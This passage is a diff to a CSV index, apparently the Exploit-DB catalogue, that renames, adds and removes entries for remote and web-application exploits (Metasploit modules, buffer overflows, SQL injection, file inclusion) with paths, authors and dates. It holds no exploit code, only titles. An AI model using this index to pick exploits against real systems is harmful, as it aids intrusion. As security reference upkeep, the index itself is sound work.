(Metasploit)",2010-08-25,Metasploit,linux,remote,0 @@ -11148,7 +11131,6 @@ id,file,description,date,author,platform,type,port 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote,0 -16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit) (2)",2010-07-03,Metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0 @@ -11217,8 +11199,8 @@ id,file,description,date,author,platform,type,port 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 -17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0 -17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0 +17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC)",2011-05-29,fdiskyou,windows,remote,0 +17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC)",2011-05-28,fdiskyou,windows,remote,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0 17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 @@ -11281,7 +11263,7 @@ id,file,description,date,author,platform,type,port 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0 -17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0 +17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,windows,remote,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 @@ -11307,7 +11289,7 @@ id,file,description,date,author,platform,type,port 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0 17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 -17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 +17936,platforms/windows/remote/17936.rb,"Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 @@ -11354,7 +11336,7 @@ id,file,description,date,author,platform,type,port 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 -18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0 +18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0 @@ -12261,7 +12243,7 @@ id,file,description,date,author,platform,type,port 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0 21129,platforms/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,linux,remote,0 -21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (Metasploit) (1)",2012-09-08,Metasploit,multiple,remote,0 +21137,platforms/multiple/remote/21137.rb,"HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)",2012-09-08,Metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,php,remote,0 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0 @@ -12538,7 +12520,7 @@ id,file,description,date,author,platform,type,port 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 -21902,platforms/windows/remote/21902.c,"Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 +21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0 @@ -12793,7 +12775,7 @@ id,file,description,date,author,platform,type,port 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 -22837,platforms/windows/remote/22837.c,"Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 +22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 @@ -12923,7 +12905,7 @@ id,file,description,date,author,platform,type,port 23296,platforms/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 -23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote,0 +23306,platforms/linux/remote/23306.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote,0 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0 23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 @@ -13318,7 +13300,7 @@ id,file,description,date,author,platform,type,port 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 -24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)",2013-04-08,Metasploit,multiple,remote,0 +24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0 @@ -13415,7 +13397,7 @@ id,file,description,date,author,platform,type,port 25275,platforms/linux/remote/25275.c,"Smail 3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 -25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - sender_address Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 +25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 @@ -13700,7 +13682,7 @@ id,file,description,date,author,platform,type,port 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,windows,remote,0 -28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (Metasploit) (2)",2013-09-10,Metasploit,windows,remote,8080 +28188,platforms/windows/remote/28188.rb,"HP SiteScope (Windows) - Remote Code Execution (Metasploit)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 @@ -13732,12 +13714,11 @@ id,file,description,date,author,platform,type,port 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - 'TSUserEX.dll' ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 -28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (1)",2013-09-20,xistence,php,remote,0 +28407,platforms/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28424,platforms/linux/remote/28424.txt,"Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 -28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)",2013-09-23,Metasploit,windows,remote,6502 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80 @@ -13952,7 +13933,6 @@ id,file,description,date,author,platform,type,port 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80 30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080 -30474,platforms/windows/remote/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-12-24,Metasploit,windows,remote,0 30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0 @@ -14984,13 +14964,13 @@ id,file,description,date,author,platform,type,port 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 -37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)",2015-07-08,Metasploit,multiple,remote,0 +37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 37576,platforms/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0 37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0 -37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617 +37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617 37611,platforms/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote,0 37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0 37647,platforms/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 @@ -15409,7 +15389,6 @@ id,file,description,date,author,platform,type,port 41684,platforms/multiple/remote/41684.rb,"GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,multiple,remote,0 41689,platforms/multiple/remote/41689.rb,"Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,multiple,remote,0 41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0 -41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2003-03-07,Metasploit,multiple,remote,0 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 @@ -17027,7 +17006,7 @@ id,file,description,date,author,platform,type,port 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 -2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 +2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - 'forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 @@ -18788,7 +18767,7 @@ id,file,description,date,author,platform,type,port 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1)",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 @@ -19811,7 +19790,7 @@ id,file,description,date,author,platform,type,port 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0 -6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 +6590,platforms/php/webapps/6590.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2)",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0 @@ -20909,7 +20888,7 @@ id,file,description,date,author,platform,type,port 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' Parameter SQL Injection",2009-02-13,JIKO,php,webapps,0 -8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0 +8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' Parameter SQL Injection",2009-02-13,Osirys,php,webapps,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0 @@ -21167,7 +21146,7 @@ id,file,description,date,author,platform,type,port 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 -8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 +8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -23098,7 +23077,7 @@ id,file,description,date,author,platform,type,port 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0 12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 -12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 +12124,platforms/php/webapps/12124.txt,"Joomla! Component Huru Helpdesk - SQL Injection (1)",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0 12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File 